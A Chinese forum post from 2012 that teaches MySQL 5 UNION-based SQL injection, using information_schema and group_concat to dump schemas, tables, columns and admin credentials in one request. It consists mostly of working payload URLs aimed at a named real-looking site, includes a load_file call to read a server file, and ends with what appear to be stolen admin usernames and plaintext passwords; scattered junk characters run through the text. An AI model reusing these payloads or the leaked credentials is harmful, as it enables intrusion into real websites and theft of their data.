此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似! v, @0 o7 X- h% Y# R
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人 a' a$ g, ?8 n
; `: Z3 ?. N) V
% {2 ^ ~, T" k- }6 U3 Q( n( l8 D3 @
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
+ D/ |* ^( A% Z1 y2 s* I, f' e2 m/ G# b* @2 U! L" A
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
' F( w) H3 @! [9 I: k
1 A4 \/ H0 X2 R- w: K下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示8 _% Y! l7 e" a: G8 ^: u% l
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
' K: E& ? Z. h+ W% g, V# U3 v
: U8 N$ w# M1 J' i8 Y7 Thttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17 \7 a+ r/ l' s! [4 C) }3 F0 b9 w* V
" p8 u- b8 f3 P8 H: t
读出所有库:8 Q) A7 G6 B; G2 _! ^
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA, s Y6 Z( w- s* N; D5 `1 X7 i
" Q& B; e. B/ G$ d2 Z$ ]: \: [- A+ F" O7 B. {) |; I; C: n( [! E6 g, ?) L
3 J7 @: \' O7 a) B6 {读出所有表:
G/ }% j8 L, Y; Fhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
2 m' D7 I( ]& o7 N, j; o% T2 r8 v6 V% l
读出所有表字段:+ b) I1 }; n4 C( Y" X
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
2 E6 ]/ `7 l ^ R& S*/ (97,100,109,105,110)为admin的ascii码 依次类推. K; a4 L0 O1 j# C
5 Y( d1 \* W! w9 p! U读出所有表字段里的内容:2 P6 q/ u9 I1 f P/ p
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
; m& w/ u: R) \: E% V; Q: J' O; \* q1 p# W
, O p w5 Y4 k
$ N( L, k# R0 W) F: N1 `" ?: F A; N1 y$ K
; E" R2 |1 Z" x K( c( P
5 {9 }8 s m. O! R( ~7 @' T
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
1 H9 P! R0 Q7 I+ Z
% X& |& b( r0 |0 _! y5 }! L# p8 p# W6 v
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%238 c" M" U# a7 i y O+ ^: o& y
: b. X1 K" M$ `+ @" Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23, J4 G/ _4 N/ p, q
' ?# E4 H* z" Z" I4 x* } {. O* u5 i+ j' o7 R/ @9 u3 k5 ]
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
$ E$ }& f6 `( J, D' ]
1 P; O% N) R. }3 I; N( A
8 I4 }7 `2 [/ [2 q( ` webmaster:dzb521123,simlab:simadmin20043233. v& @9 S; ]% n9 O
|
发表于 2012-9-13 16:37:34
收藏
支持
反对